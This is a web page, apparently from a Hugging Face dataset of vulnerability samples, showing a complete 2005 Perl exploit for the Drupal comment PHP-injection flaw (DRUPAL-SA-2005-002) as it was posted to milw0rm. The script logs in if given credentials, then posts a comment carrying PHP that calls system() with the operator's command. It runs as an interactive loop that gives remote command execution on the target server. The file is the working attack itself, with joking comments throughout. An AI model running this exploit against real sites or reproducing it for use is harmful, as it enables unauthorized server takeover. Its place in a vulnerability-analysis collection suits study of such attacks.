Team Ai
Modelpublic

lilbool/vuln-code-analysis

sourceHugging Facemitupdated 2y agoView on Hugging Face
0likes
exploit_1088.txt141 linesDownload Raw Back to exploits
1#!/usr/bin/perl

2# Mon Jul  4 18:19:35 CEST 2005 dab@digitalsec.net

3#

4# DRUPAL-SA-2005-002 php injection in comments (yes, its lame)

5# Hax0r code here, read before execute

6#

7# Run without arguments to show the help.

8#

9# BLINK! BLINK! BLINK! BLINK!

10#

11# Feel free to port to another stupid script language (mIRC,

12# python, TCL or orthers), and send to securiteam (AGAIN)

13# 

14# Theo, this one hasn't been tested in BSD.. yet!

15# infohacking: there're a lot of xss in drupal, contact me if you want 

16# to program some exploits.

17#

18# BLINK! BLINK! BLINK! BLINK!

19#

20#

21# HERE YOU CAN PUT YOUR BANNER!!!! THOUSENDS OF PEOPLE IS READING THIS LINE

22# contact me for pricing and offerings.

23#

24# !dSR: yubiiiiii yeooooooooooo

25#

26use LWP::UserAgent;

27use HTTP::Cookies;

28use LWP::Simple;

29use HTTP::Request::Common "POST";

30use HTTP::Response;

31use Getopt::Long;

32use strict;

33

34$| = 1; # ;1 = |$

35

36my ($proxy,$proxy_user,$proxy_pass);

37my ($host,$debug,$drupal_user,$drupal_pass);

38my $options = GetOptions (

39  'host=s'		     => \$host, 

40  'proxy=s'           => \$proxy,

41  'proxy_user=s'      => \$proxy_user,

42  'proxy_pass=s'      => \$proxy_pass,

43  'drupal_user=s'      => \$drupal_user,

44  'drupal_pass=s'      => \$drupal_pass,

45	'debug'         	 => \$debug);

46

47&help unless ($host);

48

49while (1){

50    print "druppy461\$ ";

51    my $cmd = <STDIN>;

52    &druppy($cmd);

53}

54exit (1); # could be replaced with exit(2)

55

56

57sub druppy {

58    chomp (my $cmd = shift);

59    LWP::Debug::level('+') if $debug;

60

61    my $ua = new LWP::UserAgent(

62            cookie_jar=> { file => "$$.cookie" });   # this is a random feature

63    $ua->agent("Morzilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!");

64

65    if ($drupal_user) { # no need to exploit 

66        my ($mhost, $h);

67        if ($host =~ /(http:\/\/.*?)\?q=/) {

68            $mhost = $1;

69            $h = $mhost . "?q=user/login";

70        } #some magic hacking here

71        else { 

72            $host =~ /(.*?)\/.*?\//; $mhost =$1;

73            $h = $mhost . "/user/login";

74        }

75        print $h . "\n" if $debug; 

76        my $req = POST $h,[

77            'edit[name]' => "$drupal_user",

78            'edit[pass]' => "$drupal_pass"

79                ]; #grab these, and send to dsr!

80        print $req->as_string() if $debug;

81        my $res = $ua->request($req);

82        print $res->content() if $debug;

83        if ($res->is_redirect eq 1) {

84            print "Logged\n" if $debug;

85        }

86    }

87

88    $ua->proxy(['http'] => $proxy) if $proxy;

89    my $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;

90    my $res = $ua->get("$host");

91    my $html = $res->content();

92    my @op; # buffer overflow here

93    foreach (split(/\n/,$html)) { 

94        if ( m/name="op" value="(.*?)"/){

95            push(@op,$1);

96        }

97    }# xss here

98

99    my $ok = 0; # globlal for admin purposes

100    foreach my $op (@op) {

101        my $req = POST "$host",[

102            'edit[subject]' => 'test',

103            'edit[comment]' => 

104             "<?php print(\"BLAH\\n\");system(\"$cmd\"); print(\"BLAH\\n\");  php?>",

105            'edit[format]' => '2',

106            'edit[cid]' => "", # drupal is sick.. it doesn't need arguments

107            'edit[pid]' => "", # they use it to grab some statistycal information

108            'edit[nid]' => "", # about users conduits. Don't buy in internet using drupal

109            'op' => "$op"

110                ];

111

112        print $req->as_string() if $debug;

113        my $res = $ua->request($req);

114        my $html = $res->content(); 

115        print $html if $debug;

116        foreach (split(/\n/,$html)) {

117            return if $ok gt "1";       # super hack de phrack

118            if (/BLAH/) { $ok++; next }

119            print "$_\n" if $ok eq "1"; # /n is for another line in screen

120        }

121    }

122}

123

124

125sub help {

126    print "Syntax: ./$0 <url> [options]\n";

127    print "\t--drupal_user, --drupal_pass  (needed if dont allow anonymous posts)\n";

128    print "\t--proxy (http), --proxy_user, --proxy_pass\n";

129    print "\t--debug\n";

130    print "\nExample\n";

131    print "bash# $0 --host=http://www.server.com/?q=comment/reply/1\n";

132    print "\n";

133    exit(1);

134}

135

136

137#sub 0day_solaris {

138# please put your code here

139#}

140

141# milw0rm.com [2005-07-05]